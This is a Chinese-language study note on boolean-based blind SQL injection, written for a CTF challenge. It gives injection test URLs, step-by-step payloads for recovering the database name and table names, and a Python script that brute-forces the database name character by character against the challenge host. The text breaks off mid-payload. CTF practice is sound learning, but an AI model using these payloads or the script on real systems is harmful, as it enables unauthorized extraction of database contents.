基于布尔的盲注学习笔记

exp利用到的ctf题： 简单的sql注入之3

步骤：

首先测试是否为布尔盲注：

http://localhost/index.php?id=2

http://localhost/index.php?id=2'

http://localhost/index.php?id=2''

http://localhost/index.php?id=2%23

http://localhost/index.php?id=2' and 1=1#

若为布尔盲注，则按照以下步骤进行：

一、得到数据库的长度

http://localhost/index.php?id=2' and length(database())>1%23

二、获取数据库名称

姿势： http://localhost/index.php?id=2' and ascii(substr(database(), {0}, 1))={1}%23

python脚本自动获取：

import requests

def getDBName(DBName_len):
    DBName = ""
   
    success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2"
    success_response_len = len(requests.get(success_url).text)
   
    url_template = "http://ctf5.shiyanbar.com/web/index_3.php?id=2' and ascii(substr(database(),{0},1))={1}%23"
    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
   
    print("Start to retrieve database name...")
    print("Success_response_len is: ", success_response_len)
    for i in range( 1, DBName_len + 1):
        print("Number of letter: " , i)
        tempDBName = DBName
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)
            url = url_template.format(i, char_ascii)
            response = requests.get(url)
            if len(response.text) == success_response_len:
                DBName += char
                print("DBName is: " + DBName + "...")
                break
        if tempDBName == DBName:
            print("Letters too little! Program ended." )
            exit()
    print("Retrieve completed! DBName is: " + DBName)
   
getDBName(5) 

三、获取表长度

姿势： http://localhost/index.php?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23

四、获取表名

和第二步获得数据库名差不多，姿势稍微变了一下：

http://localhost/index.php?id=2' and ascii(substr((sel